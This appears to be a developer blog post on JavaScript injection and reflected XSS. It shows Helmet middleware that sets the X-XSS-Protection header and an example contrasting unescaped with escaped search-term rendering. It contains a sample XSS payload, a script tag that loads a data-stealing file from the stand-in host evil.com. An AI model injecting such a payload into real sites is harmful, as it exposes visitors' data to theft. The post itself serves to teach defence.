What is JS injection and how to block it?

A solution to JS Injection

JS Injection

JavaScript is one of the most popular technologies and is widely used for web pages and web applications. It enables developers to build website functionality quickly and neatly. However, it also brings security issues that you, as a developer or tester, ought to be aware of.
Like two sides of the same coin, some people use JavaScript for the wrong purposes. One such use is JavaScript Injection. The purpose of JS Injection is to inject JavaScript code that runs on the client side.

Risks of JavaScript Injection

JS Injection gives a hacker many ways to gain control over users’ information, to change, restrict or block operations, and to manipulate parameters (for example, cookies). This can lead to serious damage, information leakage and even hacking.

The Attack

A type of JS injection attack: XSS

Cross-Site Scripting (XSS) attacks are a type of injection (JS injection). This attack basically injects malicious scripts into applications or websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to an end user.

XSS cannot be explained in detail here. However, the main takeaway is that if someone can run JavaScript on your page, your users are vulnerable to attack. This post gives you a solution to this problem.

One kind of XSS is called “Reflected XSS”. It works when a value from the query string is placed directly into the HTML of the page. By placing JavaScript in the query string, an attacker can get their JavaScript executed just by passing a malicious query string.

Suppose you are running an application with a search feature, and every time you search, it displays your search results. For example, let’s say you’ve searched for ‘nodeJS’.

When you do a search, your search terms also appear in your query string. The full URL might look something like this:


The search results might look like the screenshot below. Notice how the text appears right on the page:


What if we could search for something like

<script src="http://evil.com/stealdata.js"></script>?

That URL appears as below:


And here’s how it would appear on your page:

Suddenly, a malicious JavaScript file was executed just because you visited a URL! That’s not good.

Averting the attack

Helmet’s XSS filter is a relatively simple middleware that sets the X-XSS-Protection header. On most browsers, it sets the header to 1; mode=block. On old Internet Explorer versions, it sets it to 0 to disable it.

You can use this module as part of Helmet:

// Make sure you run "npm install helmet" to get the Helmet package.
var helmet = require('helmet')

// "app" is your Express application.
// Sets "X-XSS-Protection: 1; mode=block".
app.use(helmet.xssFilter())

You can also use it as a standalone module:

// Make sure you run "npm install x-xss-protection" to get this package.
var xssFilter = require('x-xss-protection')

// "app" is your Express application.
// Sets "X-XSS-Protection: 1; mode=block".
app.use(xssFilter())

To force the header to be set to 1; mode=block on all versions of IE, add the option:

app.use(xssFilter({ setOnOldIE: true }))
// This has some security problems for old IE!

You can also optionally configure a report URI, though the flag is specific to Chrome-based browsers. This option will report the violation to the specified URI:

app.use(xssFilter({ reportUri: '/report-xss-violation' }))

This header is included in the default Helmet bundle.

For reference, see the Helmet documentation on npm.

This solution helps protect you against one type of JS Injection, and with it your website’s users and the privacy of their data.
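As an added example (not code from the original post or from Helmet), the reflected search page from “The Attack” can be written in plain Node.js to show the unescaped rendering beside an escaped one that is sent together with the X-XSS-Protection header. The localhost URL, the q parameter and all function names are assumptions made for the illustration.

```javascript
// Constructed sample request: the route and the "q" parameter are assumptions.
// The payload is the search string quoted in the post.
const PAYLOAD = '<script src="http://evil.com/stealdata.js"></script>';
const SAMPLE_URL = 'http://localhost:3000/search?q=' + encodeURIComponent(PAYLOAD);

// Replace the characters that are significant in HTML text and in
// quoted attribute values with their entities.
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Read the (URL-decoded) search term from the query string.
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get('q') || '';
}

// Vulnerable: the term is concatenated into the HTML unchanged,
// so markup in the query string becomes markup in the page.
function renderVulnerable(requestUrl) {
  return '<h1>Results for ' + searchTerm(requestUrl) + '</h1>';
}

// Hardened: the term is escaped, so the browser displays it as text.
function renderEscaped(requestUrl) {
  return '<h1>Results for ' + escapeHtml(searchTerm(requestUrl)) + '</h1>';
}

// Response as a server would send it: escaped body plus the header
// value that the XSS filter middleware sets.
function searchResponse(requestUrl) {
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'X-XSS-Protection': '1; mode=block',
    },
    body: renderEscaped(requestUrl),
  };
}

console.log('vulnerable:', renderVulnerable(SAMPLE_URL));
console.log('escaped:   ', searchResponse(SAMPLE_URL).body);
```

The header asks the browser to filter what it detects; escaping removes the script tag from the response regardless of what the browser does.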

Please share your comments below and follow this blog if you are interested in getting more information on JavaScript.
